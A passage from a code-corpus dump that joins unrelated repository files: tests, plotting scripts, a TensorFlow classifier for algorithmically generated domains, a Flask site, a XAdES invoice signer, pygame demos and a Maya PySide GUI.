"""Run a shell command-line string and return its output, or None if it
failed. This does not expand filename patterns or environment variables or
do other shell processing steps like quoting.
Args:
line: The command line as a string to split.
trim: Whether to trim off trailing whitespace. This is useful
because the subprocess output usually ends with a newline.
timeout: timeout in seconds; None for no timeout.
Returns:
The command's output string, or None if it couldn't even run.
"""
try:
return run_cmd(tokens=line.split(), trim=trim, timeout=timeout)
except (OSError, subprocess.SubprocessError) as _:
logging.exception('Failed to run command line: %s', line)
return None
``` |
{
"source": "1fish2/pyenv_test",
"score": 3
} |
#### File: 1fish2/pyenv_test/test_pip.py
```python
import unittest
import numpy as np
class TestPip(unittest.TestCase):
def test_case(self):
a = np.arange(5)
tot = a.sum()
self.assertEqual(tot, 10)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1flei/FALCONN",
"score": 2
} |
#### File: python/test/wrapper_test.py
```python
import _falconn as falconn
import numpy as np
def test_number_of_hash_functions():
params = falconn.LSHConstructionParameters()
params.lsh_family = falconn.LSHFamily.Hyperplane
params.dimension = 10
falconn.compute_number_of_hash_functions(5, params)
assert params.k == 5
params.lsh_family = falconn.LSHFamily.CrossPolytope
falconn.compute_number_of_hash_functions(5, params)
assert params.k == 1
assert params.last_cp_dimension == 16
params.dimension = 100
params.lsh_family = falconn.LSHFamily.Hyperplane
falconn.compute_number_of_hash_functions(8, params)
assert params.k == 8
params.lsh_family = falconn.LSHFamily.CrossPolytope
falconn.compute_number_of_hash_functions(8, params)
assert params.k == 1
assert params.last_cp_dimension == 128
falconn.compute_number_of_hash_functions(10, params)
assert params.k == 2
assert params.last_cp_dimension == 2
def test_get_default_parameters():
n = 100000
dim = 128
dist_func = falconn.DistanceFunction.NegativeInnerProduct
params = falconn.get_default_parameters(n, dim, dist_func, True)
assert params.l == 10
assert params.lsh_family == falconn.LSHFamily.CrossPolytope
assert params.storage_hash_table == falconn.StorageHashTable.BitPackedFlatHashTable
assert params.num_setup_threads == 0
assert params.k == 2
assert params.dimension == dim
assert params.distance_function == dist_func
assert params.num_rotations == 1
assert params.last_cp_dimension == 64
``` |
{
"source": "1flei/lccs-lsh",
"score": 2
} |
#### File: scripts/lccs_plot/plot_single_method.py
```python
import os
import re
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial import ConvexHull
from itertools import chain, product
from scipy.interpolate import interp1d
from collections import defaultdict
from plot_sigmod import parse_res
def get_c(res):
return int(res[0][0])
def get_time(res):
return float(res[1][2])
def get_recall(res):
return float(res[1][3])
def get_params(res):
return (res[0][0], ) + tuple(res[0][1].items())
def plot_records(filename):
data_dict = defaultdict(list)
for record in parse_res(filename):
params = get_params(record)
print('record=', record)
param_key = params[1]
print('param_key=', params)
c = get_c(record)
t = get_time(record)
recall = get_recall(record)
data_dict[param_key] += [[c, t, recall]]
#use marker to encode p
#use color to encode l
marker_p = {
0 : 'o',
0.5: 'x',
1 : 's',
2 : '^',
4 : 'd',
8 : '*',
# 16: '*',
}
ls = [8, 16, 32, 64, 128, 256, 512]
markers = ['o','x','s','^','d','*', 'p']
# ls = [128]
# colors = [np.random.rand(3, ) for l in ls]
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'tab:blue', 'tab:orange', 'tab:purple', 'tab:pink', 'tab:brown', 'tab:gray']
#let color be random colors
for (param_key, data_arr), (marker, color) in zip(data_dict.items(), product(markers, colors)):
data_lp = np.array(data_arr)
# print(marker, color, param_key, data_lp)
plt.semilogy(data_lp[:, -1], data_lp[:, -2], marker=marker, label=str(param_key), color=color, markerfacecolor='none')
plt.xlim(0, 100)
plt.legend(ncol=6)
plt.show()
# color_ls = [random.randin]
#scheme : L, nprobe, ncheck, time, recall
# filename = 'results/Sift_srs_[02-17_13_15].out'
# filename = 'results/Sift_c2lsh_[10-16_11_19].out'
# filename = 'results/deep_qalsh_[02-18_09_52].out'
filename = 'results/Gist_mp_lccs_[10-15_04_55].out'
plot_records(filename)
```
#### File: lccs-lsh/scripts/to_binary.py
```python
import csv
import struct
import numpy as np
def to_binary(dataset_name):
inDataFilename = '../data/%s/%s.ds'%(dataset_name, dataset_name)
inQueryFilename = '../data/%s/%s.q'%(dataset_name, dataset_name)
outDataFilename = '../data/%s/%s.dsb'%(dataset_name, dataset_name)
outQueryFilename = '../data/%s/%s.qb'%(dataset_name, dataset_name)
print(dataset_name)
with open(inDataFilename, 'r') as fin, open(outDataFilename, 'wb') as fout:
reader = csv.reader(fin, delimiter=' ')
for row in reader:
# print(row)
x = [float(ri) for ri in row[1:] if ri!='' ]
fout.write(struct.pack('f'*len(x), *x))
with open(inQueryFilename, 'r') as fin, open(outQueryFilename, 'wb') as fout:
reader = csv.reader(fin, delimiter=' ')
for row in reader:
# print(row)
x = [float(ri) for ri in row[1:] if ri!='' ]
fout.write(struct.pack('f'*len(x), *x))
# to_binary('Mnist')
to_binary('Sift')
# to_binary('Gist')
# to_binary('Mnist784')
# to_binary('glove')
# to_binary('Trevi')
``` |
{
"source": "1flurry/Xiaoyu.github.io",
"score": 2
} |
#### File: AIE/tensorflow/cnn.py
```python
import os
import sys
import time
from datetime import timedelta
import numpy as np
import tensorflow as tf
import sklearn
from sklearn.model_selection import train_test_split
from sklearn import metrics
import tldextract
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import graph_util
'''Data preprocessing'''
def pad(dat, length=31, item=0):
if len(dat)>length:
dat=dat[0:length]
else:
dat.extend((length-len(dat))*[item])
return dat
def domain2list(domain):
diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}
data=[diction.get(x,38) for x in domain]
return pad(data)
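# Worked example (a sketch): characters map to 1-37 via `diction`, unknown
# characters map to 38, and the result is zero-padded to length 31 by `pad`, e.g.
#   domain2list('abc') -> [1, 2, 3, 0, 0, ..., 0]  (31 items in total)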
def makeData(black="./data/dga.txt",white="./data/top-1m.csv"):
X = []
Y = []
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
with open(black,'r') as f:
data=f.readlines()
for i in data:
X.append(domain2list(no_fetch_extract(i.strip()).domain))
Y.append([0])
with open("./data/top-1m.csv",'r') as f:
data=f.readlines()
for i in data:
X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))
Y.append([1])
X=np.mat(X)
Y=np.mat(Y)
return X,Y
def batch_iter(x, y, batch_size=512):
"""生成批次数据"""
data_len = len(x)
num_batch = int((data_len - 1) / batch_size) + 1
indices = np.random.permutation(np.arange(data_len))
x_shuffle = x[indices]
y_shuffle = y[indices]
for i in range(num_batch):
start_id = i * batch_size
end_id = min((i + 1) * batch_size, data_len)
yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]
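# Example usage (a sketch): iterate over shuffled mini-batches
#   for x_batch, y_batch in batch_iter(x_train, y_train, batch_size=512):
#       ...  # feed each mini-batch to the training step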
'''Get the elapsed time'''
def get_time_dif(start_time):
end_time = time.time()
time_dif = end_time - start_time
return timedelta(seconds=int(round(time_dif)))
'''Evaluate accuracy and loss on a given dataset'''
def evaluate(sess, x_, y_,loss,acc):
data_len = len(x_)
batch_eval = batch_iter(x_, y_, batch_size)
total_loss = 0.0
total_acc = 0.0
for x_batch, y_batch in batch_eval:
batch_len = len(x_batch)
loss_n, acc_n = sess.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: 0.25})
total_loss += loss_n * batch_len
total_acc += acc_n * batch_len
return total_loss / data_len, total_acc / data_len
if __name__ == '__main__':
    '''Model parameters'''
    embedding_dim = 4  # word embedding dimension
    seq_length = 31  # sequence length
    num_classes = 1  # number of classes
    num_filters = 20  # number of convolution filters
    kernel_size = 3  # convolution kernel size
    vocab_size = 39  # vocabulary size
    dropout_keep_prob = 0.75  # dropout keep probability
    learning_rate = 0.001  # learning rate
    batch_size = 1024  # training batch size
    num_epochs = 20  # total number of epochs
    print_per_batch = 1000  # print results every this many batches
    save_per_batch = 1000  # write to TensorBoard every this many batches
    output_graph_name = 'model.pb'  # saved model file name
    output_fld = '/model/'  # save path
    '''Load training and validation sets'''
print("Loading training and validation data...")
X,Y=makeData()
#vocab_size = len(X)
x_train, x_val, y_train, y_val = train_test_split(X,Y,test_size=0.1)
print(x_train.shape)
print(y_train.shape)
print(x_val.shape)
print(y_val.shape)
del X,Y
    '''Build the model'''
    print('Configuring CNN model...')
    # placeholders for the input data
    #with tf.Graph().as_default() as g:
    input_x = tf.placeholder(tf.int32, [None, seq_length], name='input_x_')
    input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y_')
    keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')
    # build the CNN model
    with tf.device('/cpu:0'):  # force these ops onto the CPU
embedding = tf.get_variable('embedding', [vocab_size, embedding_dim])
embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)
with tf.name_scope("cnn"):
conv_1 = tf.layers.conv1d(embedding_inputs, num_filters, kernel_size, name='conv_1')
maxp = tf.layers.max_pooling1d(conv_1, 2, 2)
conv_2 = tf.layers.conv1d(maxp, num_filters, kernel_size, name='conv_2')
maxp = tf.layers.max_pooling1d(conv_2, 2, 2)
flatten = tf.contrib.layers.flatten(maxp)
with tf.name_scope("score"):
        # fully-connected layers, followed by dropout and sigmoid activation
fc = tf.layers.dropout(flatten,0.25)
fc = tf.layers.dense(fc, 16, name='fc1')
fc = tf.layers.dense(fc, num_classes, name='fc2')
    with tf.name_scope('output'):
        # output layer
        logits = tf.nn.sigmoid(fc, name='main_output')
    with tf.name_scope("optimize"):
        # loss function: cross-entropy
        cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=input_y)
        loss = tf.reduce_mean(cross_entropy)
        # optimizer
        optim = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(loss)
    with tf.name_scope("accuracy"):
        # accuracy
        logits = tf.cast(logits, tf.int32)
        y = tf.cast(input_y, tf.int32)
        correct_pred = tf.equal(logits, y)
        acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
tf.summary.scalar("loss", loss)
tf.summary.scalar("accuracy", acc)
merged_summary = tf.summary.merge_all()
    '''Create the TensorFlow session'''
session = tf.Session()
session.run(tf.global_variables_initializer())
    '''Train the model'''
    print('Training and evaluating...')
    start_time = time.time()
    total_batch = 0  # total batches processed
    best_acc_val = 0.0  # best validation accuracy
    last_improved = 0  # batch index of the last improvement
    require_improvement = 40000  # stop early if no improvement after 40000 batches
flag = False
for epoch in range(num_epochs):
print('Epoch:', epoch + 1)
batch_train = batch_iter(x_train, y_train, batch_size)
for x_batch, y_batch in batch_train:
#feed_dict = feed_data(x_batch, y_batch, 0.75)
feed_dict = {input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob}
if total_batch % print_per_batch == 0:
                # periodically report performance on the training and validation sets
loss_train, acc_train = session.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob})
loss_val, acc_val = evaluate(session, x_val, y_val, loss, acc) # todo
time_dif = get_time_dif(start_time)
msg = 'Iter: {0:>6}, Train Loss: {1:}, Train Acc: {2:>7.2%},' \
+ ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5}'
print(msg.format(total_batch, loss_train, acc_train, loss_val, acc_val, time_dif))
            session.run(optim, feed_dict=feed_dict)  # run one optimization step
total_batch += 1
if total_batch - last_improved > require_improvement:
                # validation accuracy has not improved for a long time; stop training early
print("No optimization for a long time, auto-stopping...")
flag = True
                break  # exit the batch loop
        #session.run(tf.assign(learning_rate, 0.001 * (0.95 ** epoch)),float32)  # gradually decay the learning rate
#learning_rate = session.run(lr)
        if flag:  # same as above, exit the epoch loop
break
    '''Save the model'''
if not os.path.exists(output_fld):
os.makedirs(output_fld)
with tf.Graph().as_default() as g:
graph = session.graph
input_graph_def = graph.as_graph_def()
        constant_graph = graph_util.convert_variables_to_constants(session, input_graph_def, output_node_names=['output/main_output'])
        # because a name_scope is used, the scope prefix 'output/' must precede main_output
with tf.gfile.FastGFile(output_fld+output_graph_name, mode='wb') as f:
f.write(constant_graph.SerializeToString())
```
#### File: 1flurry/Xiaoyu.github.io/www.py
```python
from flask import *
from apps.restful import api
import json
from flask_bootstrap import Bootstrap
app = Flask(__name__)
Bootstrap(app)
app.register_blueprint(api)
@app.route('/')
def index():
return render_template("base.html")
@app.route('/about')
def resume():
return render_template("resume.html")
@app.route('/blog')
def blog():
return render_template("blog.html")
@app.route('/link')
def link():
return render_template("link.html")
if __name__ == '__main__':
app.run(host='127.0.0.1',debug=True)
``` |
{
"source": "1fox/firma_xades",
"score": 2
} |
#### File: 1fox/firma_xades/firma.py
```python
u"""
Firma facturaE.xml
@author: <NAME>e 9 16:49:47 CET 2019
https://github.com/juhegue/firma_xades
Minor adaptation
@author: 1Fox mié oct 9 16:49:47 CET 2019
https://github.com/1fox/firma_xades
Página para chequear la factura firmada
http://sedeaplicaciones2.minetur.gob.es/FacturaE/
"""
__version__ = '0.0.1a'
import base64
import datetime
import hashlib
from lxml import etree
from OpenSSL import crypto
import random
import urllib.request
import xmlsig
def parse_xml(name):
return etree.parse(name).getroot()
def save_xml(name, data):
with open(name, 'wb') as w:
w.write(data)
def leecertificado(name):
with open(name, 'rb') as f:
return f.read()
def sign_file(cert, password, xml_firma):
random_val = random.randint(1, 99999)
signature_id = 'Signature-%s' % random_val
signed_properties_id = 'SignedProperties-%s' % signature_id
signature_value = 'SignatureValue-%s' % random_val
qualifying_properties = 'QualifyingProperties-%05d' % random_val
key_info_id = 'KeyInfoId-%s' % signature_id
reference_id = 'Reference-%05d' % random_val
object_id = 'XadesObjectId-%05d' % random_val
xades = 'http://uri.etsi.org/01903/v1.3.2#'
ds = 'http://www.w3.org/2000/09/xmldsig#'
xades141 = 'http://uri.etsi.org/01903/v1.4.1#'
sig_policy_identifier = 'http://www.facturae.es/politica_de_firma_formato_facturae/politica_de_firma_formato_facturae_v3_1.pdf'
sig_policy_hash_value = 'Ohixl6upD6av8N7pEvDABhEL6hM='
root = xml_firma
certificate = crypto.load_pkcs12(cert, password)
sign = etree.Element(
etree.QName(ds, 'Signature'),
nsmap={'ds': ds, 'xades': 'http://uri.etsi.org/01903/v1.3.2#'},
attrib={
xmlsig.constants.ID_ATTR: signature_id,
}
)
signed_info = etree.SubElement(
sign,
etree.QName(ds, 'SignedInfo')
)
etree.SubElement(
signed_info,
etree.QName(ds, 'CanonicalizationMethod'),
attrib={
'Algorithm': xmlsig.constants.TransformInclC14N
}
)
etree.SubElement(
signed_info,
etree.QName(ds, 'SignatureMethod'),
attrib={
'Algorithm': xmlsig.constants.TransformRsaSha256
}
)
reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
xmlsig.constants.ID_ATTR: reference_id,
'URI': ''
}
)
transforms = etree.SubElement(
reference,
etree.QName(ds, 'Transforms'),
)
etree.SubElement(
transforms,
etree.QName(ds, 'Transform'),
attrib={
'Algorithm': 'http://www.w3.org/2000/09/xmldsig#enveloped-signature'
}
)
etree.SubElement(
reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
etree.SubElement(
reference,
etree.QName(ds, 'DigestValue')
)
sec_reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
xmlsig.constants.ID_ATTR: 'ReferenceKeyInfo',
'URI': '#' + key_info_id
}
)
etree.SubElement(
sec_reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
digest_value2 = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
sec_reference,
etree.QName(ds, 'DigestValue')
).text = base64.b64encode(digest_value2.digest())
tr_reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
'Type': 'http://uri.etsi.org/01903#SignedProperties',
'URI': '#' + signed_properties_id,
}
)
etree.SubElement(
tr_reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
digest_value3 = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
tr_reference,
etree.QName(ds, 'DigestValue')
).text = base64.b64encode(digest_value3.digest())
etree.SubElement(
sign,
etree.QName(ds, 'SignatureValue'),
attrib={
xmlsig.constants.ID_ATTR: signature_value
}
)
key_info = etree.SubElement(
sign,
etree.QName(ds, 'KeyInfo'),
attrib={
xmlsig.constants.ID_ATTR: key_info_id
}
)
x509 = etree.SubElement(
key_info,
etree.QName(ds, 'X509Data'),
)
etree.SubElement(
x509,
etree.QName(ds, 'X509Certificate'),
)
etree.SubElement(
key_info,
etree.QName(ds, 'KeyValue'),
)
object_node = etree.SubElement(
sign,
etree.QName(xmlsig.constants.DSigNs, 'Object'),
attrib={xmlsig.constants.ID_ATTR: object_id}
)
qualifying_properties = etree.SubElement(
object_node,
etree.QName(xades, 'QualifyingProperties'),
nsmap={'xades': xades, 'xades141': xades141},
attrib={
xmlsig.constants.ID_ATTR: qualifying_properties,
'Target': '#' + signature_id
})
signed_properties = etree.SubElement(
qualifying_properties,
etree.QName(xades, 'SignedProperties'),
attrib={
xmlsig.constants.ID_ATTR: signed_properties_id
}
)
signed_signature_properties = etree.SubElement(
signed_properties,
etree.QName(xades, 'SignedSignatureProperties')
)
etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SigningTime')
).text = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S%z')
signing_certificate = etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SigningCertificate')
)
signing_certificate_cert = etree.SubElement(
signing_certificate,
etree.QName(xades, 'Cert')
)
cert_digest = etree.SubElement(
signing_certificate_cert,
etree.QName(xades, 'CertDigest')
)
etree.SubElement(
cert_digest,
etree.QName(xmlsig.constants.DSigNs, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
hash_cert = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
cert_digest,
etree.QName(xmlsig.constants.DSigNs, 'DigestValue')
).text = base64.b64encode(hash_cert.digest())
issuer_serial = etree.SubElement(
signing_certificate_cert,
etree.QName(xades, 'IssuerSerial')
)
etree.SubElement(
issuer_serial,
etree.QName(xmlsig.constants.DSigNs, 'X509IssuerName')
).text = xmlsig.utils.get_rdns_name(certificate.get_certificate().to_cryptography().issuer.rdns)
etree.SubElement(
issuer_serial,
etree.QName(xmlsig.constants.DSigNs, 'X509SerialNumber')
).text = str(certificate.get_certificate().get_serial_number())
signature_policy_identifier = etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SignaturePolicyIdentifier')
)
signature_policy_id = etree.SubElement(
signature_policy_identifier,
etree.QName(xades, 'SignaturePolicyId')
)
sig_policy_id = etree.SubElement(
signature_policy_id,
etree.QName(xades, 'SigPolicyId')
)
etree.SubElement(
sig_policy_id,
etree.QName(xades, 'Identifier')
).text = sig_policy_identifier
etree.SubElement(
sig_policy_id,
etree.QName(xades, 'Description')
).text = 'facturae31'
sig_policy_hash = etree.SubElement(
signature_policy_id,
etree.QName(xades, 'SigPolicyHash')
)
etree.SubElement(
sig_policy_hash,
etree.QName(xmlsig.constants.DSigNs, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2000/09/xmldsig#sha1'
})
    try:
        remote = urllib.request.urlopen(sig_policy_identifier)
        hash_value = base64.b64encode(hashlib.sha1(remote.read()).digest())
    except Exception:
        hash_value = sig_policy_hash_value
etree.SubElement(
sig_policy_hash,
etree.QName(xmlsig.constants.DSigNs, 'DigestValue')
).text = hash_value
etsi = xades
signer_role = etree.SubElement(
signed_signature_properties,
etree.QName(etsi, 'SignerRole')
)
claimed_roles = etree.SubElement(
signer_role,
etree.QName(etsi, 'ClaimedRoles')
)
etree.SubElement(
claimed_roles,
etree.QName(etsi, 'ClaimedRole')
).text = 'emisor'
ctx = xmlsig.SignatureContext()
key = crypto.load_pkcs12(cert, password)
ctx.x509 = key.get_certificate().to_cryptography()
ctx.public_key = ctx.x509.public_key()
ctx.private_key = key.get_privatekey().to_cryptography_key()
# print (etree.tostring(sign))
root.append(sign)
ctx.sign(sign)
return etree.tostring(root, encoding='UTF-8', xml_declaration=True, standalone=False)
def firma_xml(certificado, clave, factura_xml, factura_xml_firmada):
sig_xml = sign_file(leecertificado(certificado), clave, parse_xml(factura_xml))
save_xml(factura_xml_firmada, sig_xml)
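# Example usage (a sketch with hypothetical file names; the password must be bytes,
# as done via str.encode in the __main__ block below):
#   firma_xml('certificado.pfx', b'password', 'factura.xml', 'factura_firmada.xml')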
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter, )
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('-o', dest='origen', type=str, required=True, help='factura xml origen.')
parser.add_argument('-d', dest='destino', type=str, required=False, help='factura xml destino.')
parser.add_argument('-c', dest='certificado', type=str, required=True, help='certificado.')
parser.add_argument('-p', dest='clave', type=str, required=True, help='clave.')
args = parser.parse_args()
try:
sig_xml = sign_file(leecertificado(args.certificado), str.encode(args.clave), parse_xml(args.origen))
save_xml(args.destino or args.origen, sig_xml)
except crypto.Error as e:
        print('Error in certificate/password')
except IOError as e:
print ('%s' % e)
``` |
{
"source": "1fth3n3ls3/pygamescroll2d",
"score": 3
} |
#### File: 1fth3n3ls3/pygamescroll2d/space_trucker_no_pool.py
```python
import pygame
import random
from pygame.locals import (
KEYDOWN,
K_UP,
K_DOWN,
K_RIGHT,
K_LEFT,
QUIT,
K_ESCAPE
)
# CONSTANTS
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
self.surf = pygame.Surface((64, 16))
self.surf.fill((192, 192, 192))
self.rect = self.surf.get_rect()
def update(self, keys_pressed):
if self.rect.bottom < SCREEN_HEIGHT and keys_pressed[K_DOWN]:
self.rect.move_ip(0, 4)
if self.rect.top > 0 and keys_pressed[K_UP]:
self.rect.move_ip(0, -4)
if self.rect.left > 0 and keys_pressed[K_LEFT]:
self.rect.move_ip(-4, 0)
if self.rect.right < SCREEN_WIDTH and keys_pressed[K_RIGHT]:
self.rect.move_ip(4, 0)
class Enemy(pygame.sprite.Sprite):
def __init__(self):
super(Enemy, self).__init__()
self.surf = pygame.Surface((16, 4))
self.surf.fill((255, 255, 255))
self.rect = self.surf.get_rect(
center = (random.randint(SCREEN_WIDTH + 16, SCREEN_WIDTH + 128),
random.randint(0, SCREEN_HEIGHT))
)
self.speed = random.randint(4, 32)
def update(self):
self.rect.move_ip(-self.speed, 0)
if self.rect.right < 0: self.kill()
def main():
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
ADDENEMY = pygame.USEREVENT + 1 # create new userevent
pygame.time.set_timer(ADDENEMY, 250)
run = True
player = Player()
enemies = pygame.sprite.Group()
all_sprites = pygame.sprite.Group()
all_sprites.add(player)
while run:
for event in pygame.event.get():
if event.type == QUIT:
run = False
if event.type == KEYDOWN and event.key == K_ESCAPE:
run = False
if event.type == ADDENEMY:
new_enemy = Enemy()
enemies.add(new_enemy)
all_sprites.add(new_enemy)
player.update(pygame.key.get_pressed())
enemies.update()
screen.fill((0, 0, 50))
for entity in all_sprites:
screen.blit(entity.surf, entity.rect)
pygame.display.flip()
if __name__ == "__main__":
import cProfile as profile
# main()
pygame.init()
profile.run("main()")
pygame.quit()
```
#### File: 1fth3n3ls3/pygamescroll2d/space_trucker.py
```python
import pygame
import random
from pygame.locals import (
KEYDOWN,
K_UP,
K_DOWN,
K_RIGHT,
K_LEFT,
QUIT,
K_ESCAPE
)
# CONSTANTS
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
ENEMY_COUNT = 20
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
self.surf = pygame.Surface((64, 16))
self.surf.fill((192, 192, 192))
self.rect = self.surf.get_rect()
def update(self, keys_pressed):
if self.rect.bottom < SCREEN_HEIGHT and keys_pressed[K_DOWN]:
self.rect.move_ip(0, 4)
if self.rect.top > 0 and keys_pressed[K_UP]:
self.rect.move_ip(0, -4)
if self.rect.left > 0 and keys_pressed[K_LEFT]:
self.rect.move_ip(-4, 0)
if self.rect.right < SCREEN_WIDTH and keys_pressed[K_RIGHT]:
self.rect.move_ip(4, 0)
class Enemy(pygame.sprite.DirtySprite):
def __init__(self):
super(Enemy, self).__init__()
self.surf = pygame.Surface((16, 4))
self.surf.fill((255, 255, 255))
self.rect = self.surf.get_rect(center = self._get_random_pos())
self.speed = random.randint(4, 16)
def update(self):
self.rect.move_ip(-self.speed, 0)
if self.rect.right < 0: self.kill()
def spawn(self):
self.rect.center = self._get_random_pos()
def _get_random_pos(self):
return random.randint(SCREEN_WIDTH + 16, SCREEN_WIDTH + 128), random.randint(0, SCREEN_HEIGHT)
def main():
clock = pygame.time.Clock()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
ADDENEMY = pygame.USEREVENT + 1 # create new userevent
pygame.time.set_timer(ADDENEMY, 250)
run = True
enemy_counter = 0
player = Player()
enemies = pygame.sprite.Group()
enemies_pool = [Enemy() for i in range(ENEMY_COUNT)]
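    # A fixed-size pool of Enemy objects is reused across spawns (contrast with
    # space_trucker_no_pool.py, which allocates a new Enemy per spawn event).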
all_sprites = pygame.sprite.Group()
all_sprites.add(player)
while run:
for event in pygame.event.get():
if event.type == QUIT:
run = False
if event.type == KEYDOWN and event.key == K_ESCAPE:
run = False
if event.type == ADDENEMY:
enemy_counter = 0 if enemy_counter >= ENEMY_COUNT-1 else enemy_counter + 1
enemy = enemies_pool[enemy_counter]
if not enemy.alive():
enemy.spawn()
enemies.add(enemy)
all_sprites.add(enemy)
if pygame.sprite.spritecollideany(player, enemies):
player.kill()
run = False
player.update(pygame.key.get_pressed())
enemies.update()
screen.fill((0, 0, 50))
for entity in all_sprites:
screen.blit(entity.surf, entity.rect)
pygame.display.flip()
clock.tick(60)
if __name__ == "__main__":
pygame.init()
import cProfile as profile
profile.run("main()")
# main()
pygame.quit()
``` |
{
"source": "1fth3n3ls3/pylib",
"score": 3
} |
#### File: 1fth3n3ls3/pylib/hierarchyconvertergui.py
```python
from PySide2 import QtWidgets, QtCore, QtGui
class Window(QtWidgets.QMainWindow):
convertPressed = QtCore.Signal(str)
def __init__(self, title='', parent=None):
super(Window, self).__init__(parent=parent)
self.setWindowTitle(title)
self.configureWidgets()
self.connectEvents()
def configureWidgets(self):
self.container = QtWidgets.QWidget(self)
self.layout = QtWidgets.QHBoxLayout(self.container)
self.container.setLayout(self.layout)
self.label = QtWidgets.QLabel('Prefix: ', self.container)
self.textBox = QtWidgets.QLineEdit(self.container)
self.button = QtWidgets.QPushButton('Convert', self.container)
self.layout.addWidget(self.label)
self.layout.addWidget(self.textBox)
self.layout.addWidget(self.button)
self.setCentralWidget(self.container)
def connectEvents(self):
self.button.clicked.connect(self.onClick)
# self.controller.selectionChanged.connect(self.updateStatusBar)
def updateStatusBar(self, newSel):
if not newSel:
txt = 'Nothing selected.'
elif len(newSel) == 1:
txt = '{0} selected'.format(newSel[0])
else:
txt = '{0} objects selected.'.format(str(len(newSel)))
self.statusBar().showMessage(txt)
# events
def onClick(self):
self.convertPressed.emit(self.textBox.text())
class ConvertHierarchyController(QtCore.QObject):
selectionChanged = QtCore.Signal(list)
def _pytest():
import random
controller = ConvertHierarchyController()
def nextSel():
return random.choice([
[],
['single'],
['single', 'double']])
def onConvert(prefix):
print('Convert clicked! Prefix:', prefix)
controller.selectionChanged.emit(nextSel())
app = QtWidgets.QApplication([])
win = Window('Hierarchy Converter')
win.convertPressed.connect(onConvert)
controller.selectionChanged.connect(win.updateStatusBar)
win.show()
app.exec_()
if __name__ == "__main__":
_pytest()
```
#### File: 1fth3n3ls3/pylib/hierarchyconvertermaya.py
```python
import hierarchyconvertergui as gui
import utils
import pymel.core as pmc
import maya.OpenMaya as om
import charcreator
from PySide2 import QtCore
_window = None
# def show():
# global _window
# if _window is None:
# cont = gui.ConvertHierarchyController()
# def emiSelChanged(_):
# """This methods emits a list of selected nodes"""
# cont.selectionChanged.emit(pmc.selected(type='transform'))
# om.MEventMessage.addEventCallback('SelectionChanged', emiSelChanged)
# parent = utils.getMayaWindow()
# _window = gui.Window(cont, parent=parent)
# def onConvert(prefix):
# settings = dict(charcreator.SETTINGS_DEFAULT,
# prefix=unicode(prefix))
# charcreator.convert_hierarchies_main(settings)
# _window.convertPressed.connect(onConvert)
# _window.show()
class MayaController(QtCore.QObject):
"""
# Call this way from shelve
from pylib.hierarchyconvertermaya import MayaController
MayaController()
"""
view = None
selectionChanged = QtCore.Signal(list) # must be defined as class atributte
def __init__(self):
super(MayaController, self).__init__() # needed to initialize QObject
if MayaController.view is None:
MayaController.view = gui.Window('Hierarchy Converter', parent=utils.getMayaWindow())
self.establishConnections()
MayaController.view.show()
def emitSelectionChanged(self, _):
"""This methods emits a list of selected nodes"""
self.selectionChanged.emit(pmc.selected(type='transform'))
def establishConnections(self):
self.selectionChanged.connect(MayaController.view.updateStatusBar)
MayaController.view.convertPressed.connect(self.onConvert)
om.MEventMessage.addEventCallback('SelectionChanged', self.emitSelectionChanged)
def onConvert(self, prefix):
